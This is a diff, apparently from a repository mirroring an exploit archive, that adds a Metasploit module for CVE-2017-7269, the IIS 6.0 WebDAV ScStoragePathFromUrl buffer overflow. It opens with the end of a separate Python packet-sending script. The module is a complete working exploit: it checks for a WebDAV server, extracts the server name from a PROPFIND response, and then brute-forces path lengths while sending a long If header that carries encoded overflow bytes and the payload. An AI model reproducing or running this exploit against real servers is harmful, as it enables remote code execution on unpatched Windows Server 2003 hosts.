||||
"packet_id": 1,
|
||||
"data": b"a" * 2048})
|
||||
sock.sendto(control_packet, (HOST, PORT))
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
178
platforms/windows/remote/41992.rb
Executable file
178
platforms/windows/remote/41992.rb
Executable file
|
@ -0,0 +1,178 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow',
|
||||
'Description' => %q{
|
||||
Buffer overflow in the ScStoragePathFromUrl function
|
||||
in the WebDAV service in Internet Information Services (IIS) 6.0
|
||||
in Microsoft Windows Server 2003 R2 allows remote attackers to
|
||||
execute arbitrary code via a long header beginning with
|
||||
"If: <http://" in a PROPFIND request, as exploited in the
|
||||
wild in July or August 2016.
|
||||
|
||||
Original exploit by Zhiniang Peng and Chen Wu.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Zhiniang Peng', # Original author
|
||||
'Chen Wu', # Original author
|
||||
'Dominic Chell <dominic@mdsec.co.uk>', # metasploit module
|
||||
'firefart', # metasploit module
|
||||
'zcgonvh <zcgonvh@qq.com>', # metasploit module
|
||||
'Rich Whitcroft' # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-7269' ],
|
||||
[ 'BID', '97127' ],
|
||||
[ 'URL', 'https://github.com/edwardz246003/IIS_exploit' ],
|
||||
[ 'URL', 'https://0patch.blogspot.com/2017/03/0patching-immortal-cve-2017-7269.html' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00",
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
|
||||
'DisableNops' => 'True',
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
'BufferRegister' => 'ESI',
|
||||
}
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'PrependMigrate' => true,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Microsoft Windows Server 2003 R2 SP2',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
},
|
||||
],
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'DisclosureDate' => 'Mar 26 2017',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
|
||||
OptInt.new('MINPATHLENGTH', [ true, 'Start of physical path brute force', 3 ]),
|
||||
OptInt.new('MAXPATHLENGTH', [ true, 'End of physical path brute force', 60 ]),
|
||||
])
|
||||
end
|
||||
|
||||
def min_path_len
|
||||
datastore['MINPATHLENGTH']
|
||||
end
|
||||
|
||||
def max_path_len
|
||||
datastore['MAXPATHLENGTH']
|
||||
end
|
||||
|
||||
def supports_webdav?(headers)
|
||||
if headers['MS-Author-Via'] == 'DAV' ||
|
||||
headers['DASL'] == '<DAV:sql>' ||
|
||||
headers['DAV'] =~ /^[1-9]+(,\s+[1-9]+)?$/ ||
|
||||
headers['Public'] =~ /PROPFIND/ ||
|
||||
headers['Allow'] =~ /PROPFIND/
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => target_uri.path,
|
||||
'method' => 'OPTIONS'
|
||||
})
|
||||
if res && res.headers['Server'].include?('IIS/6.0') && supports_webdav?(res.headers)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
elsif res && supports_webdav?(res.headers)
|
||||
return Exploit::CheckCode::Detected
|
||||
elsif res.nil?
|
||||
return Exploit::CheckCode::Unknown
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# extract the local servername and port from a PROPFIND request
|
||||
# these need to be the values from the backend server
|
||||
# if testing a reverse proxy setup, these values differ
|
||||
# from RHOST and RPORT but can be extracted this way
|
||||
vprint_status("Extracting ServerName and Port")
|
||||
res = send_request_raw(
|
||||
'method' => 'PROPFIND',
|
||||
'headers' => {
|
||||
'Content-Length' => 0
|
||||
},
|
||||
'uri' => target_uri.path
|
||||
)
|
||||
fail_with(Failure::BadConfig, "Server did not respond correctly to WebDAV request") if(res.nil? || res.code != 207)
|
||||
|
||||
xml = res.get_xml_document
|
||||
url = URI.parse(xml.at("//a:response//a:href").text)
|
||||
server_name = url.hostname
|
||||
server_port = url.port
|
||||
server_scheme = url.scheme
|
||||
|
||||
http_host = "#{server_scheme}://#{server_name}:#{server_port}"
|
||||
vprint_status("Using http_host #{http_host}")
|
||||
|
||||
min_path_len.upto(max_path_len) do |path_len|
|
||||
vprint_status("Trying path length of #{path_len}...")
|
||||
|
||||
begin
|
||||
buf1 = "<#{http_host}/"
|
||||
buf1 << rand_text_alpha(114 - path_len)
|
||||
buf1 << "\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"
|
||||
buf1 << ">"
|
||||
buf1 << " (Not <locktoken:write1>) <#{http_host}/"
|
||||
buf1 << rand_text_alpha(114 - path_len)
|
||||
buf1 << "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81"
|
||||
buf1 << payload.encoded
|
||||
buf1 << ">"
|
||||
|
||||
vprint_status("Sending payload")
|
||||
res = send_request_raw(
|
||||
'method' => 'PROPFIND',
|
||||
'headers' => {
|
||||
'Content-Length' => 0,
|
||||
'If' => "#{buf1}"
|
||||
},
|
||||
'uri' => target_uri.path
|
||||
)
|
||||
if res
|
||||
vprint_status("Server returned status #{res.code}")
|
||||
if res.code == 502 || res.code == 400
|
||||
next
|
||||
elsif session_created?
|
||||
return
|
||||
else
|
||||
vprint_status("Unknown Response: #{res.code}")
|
||||
end
|
||||
end
|
||||
rescue ::Errno::ECONNRESET
|
||||
vprint_status("got a connection reset")
|
||||
next
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue